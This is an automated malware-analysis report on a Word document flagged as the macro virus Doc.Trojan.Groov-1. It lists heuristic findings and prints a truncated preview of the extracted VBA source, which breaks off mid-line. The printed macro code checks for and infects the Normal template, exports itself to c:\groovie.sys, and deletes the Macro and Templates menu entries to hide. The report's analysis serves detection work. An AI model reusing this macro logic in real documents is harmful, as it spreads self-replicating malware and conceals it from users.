Verdict: MALICIOUS
Risk Score: 360
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample exhibits multiple high and critical heuristic firings related to legacy WordBasic and VBA macros, including the use of Shell() calls and auto-execution functions like AutoOpen. The presence of 'Doc.Trojan.Groov-1' from ClamAV further confirms its malicious nature. The VBA script, though truncated, indicates macro execution and potential payload delivery, consistent with a macro-based malware dropper.
Heuristics (7)
| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Doc.Trojan.Groov-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Trojan.Groov-1 |
| VBA macros detected | medium (4 related findings) | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| Auto_Close macro | high | OLE_VBA_AUTOCLOSE | Auto_Close macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Legacy WordBasic macro-virus markers | high | OLE_LEGACY_WORDBASIC_MACRO_VIRUS | OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. |
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16279 bytes | 2929728523e96dc41e7b1f373e3dbe529060149b8d56b2bc5b208a3ca2244110 | ClamAV: Doc.Trojan.Groov-1 | unlikely |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "groovie"
Public I01 As String
Public I03 As Boolean
' O12/22/98 5:35:20 AM728OIT728Xerox Printer on LPT2:
Public I04 As Boolean
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Public I05 As Boolean
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Public I06 As String
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Public I07 As Boolean
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Public I08 As Boolean
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Function I09()
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
On Error Resume Next
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If MacroContainer = NormalTemplate Then
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
I01 = "normal"
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
GoTo checkout
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
End If
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If MacroContainer = ActiveDocument Then I01 = "document"
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If MacroContainer = "data.dot" Then I01 = "orbit"
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
checkout:
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
End Function
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Function I10()
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
On Error Resume Next
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If Dir(Application.StartupPath + "\data.dot") = "data.dot" Then I02 = True
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If ActiveDocument.VBProject.VBComponents(I).Name = "groovie" Then I04 = True
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Next I
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If NormalTemplate.VBProject.VBComponents(I).Name = "groovie" Then I03 = True
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Next I
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or GetAttr(NormalTemplate.FullName) = vbReadOnly Then I05 = True
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
End Function
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Function I11()
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
On Error Resume Next
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Call I09
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Call I10
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I01 = "document" Then Call I12
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I01 = "normal" Then Call I13
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I01 = "orbit" Then Call I14
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I05 = False Then CommandBars("tools").Controls("Macro").Delete
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I05 = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
End Function
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Function I12()
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
On Error Resume Next
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
Application.VBE.ActiveVBProject.VBComponents("groovie").Export "c:\groovie.sys"
' O12/22/98 5:35:21 AM728OIT728Xerox Printer on LPT2:
If I03 = False And I05 = False Then
' O12/22/98 5:35:21 AM728OIT728Xerox Prin
```

... (truncated)